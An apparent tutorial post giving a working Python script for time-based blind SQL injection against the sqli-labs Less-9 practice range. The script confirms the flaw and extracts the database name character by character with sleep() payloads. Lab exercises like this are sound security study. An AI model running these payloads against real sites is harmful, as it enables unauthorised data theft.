Time-based blind SQL injection against the sqli-labs range with Python
Learning to write a simple PoC in Python. The code is quite simple: it only checks whether the injection point exists, gets the length of the database name, and reads out the database name.
Getting the table names and column names is not written... mainly out of laziness! Just change the corresponding payloads.
import time
import requests

SLEEP = 5  # seconds the injected sleep() runs; a response at least this slow means "true"

def Judge(url):
    # Unconditional sleep: a slow response means the injected SQL reached sleep()
    payload = "' and if(1,sleep(%d),1) --+" % SLEEP
    new_url = url + payload
    StartTime = time.time()
    requests.get(new_url)
    if time.time() - StartTime >= SLEEP:
        print("[+] URL is vulnerable")
        return True
    print("[-] URL is not vulnerable")
    return False

def GetLength(url):
    # Try each candidate length in turn; the one that triggers the sleep is correct
    for i in range(1, 30):
        payload = "' and if(length(database())=%d,sleep(%d),1) --+" % (i, SLEEP)
        Starttime = time.time()
        requests.get(url + payload)
        if time.time() - Starttime >= SLEEP:
            print("database length is %d" % i)
            return i
    return None  # no length in 1..29 triggered the sleep

def GetDataName(url, length):
    charset = 'qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM0123456789'
    Database = ''  # accumulated outside the loops so every recovered character is kept
    for i in range(1, length + 1):
        for j in charset:
            # %s must be quoted: substr() returns a string, so it is compared with 'x'
            payload = "' and if(substr(database(),%d,1)='%s',sleep(%d),1) --+" % (i, j, SLEEP)
            Starttime = time.time()
            requests.get(url + payload)
            if time.time() - Starttime >= SLEEP:
                Database += j
                print(j, end='', flush=True)
                break
    print()
    return Database

url = "http://xxx/Less-9/?id=1"
if Judge(url):
    length = GetLength(url)
    if length:
        GetDataName(url, length)
Inside GetDataName(), substr() could be wrapped in ascii(); here I simply compare the extracted substring directly. Remember that the %s must be wrapped in single quotes, because what substr() returns is a string.
The code is fairly crude and not very reusable; the payload strings could be factored out on their own.
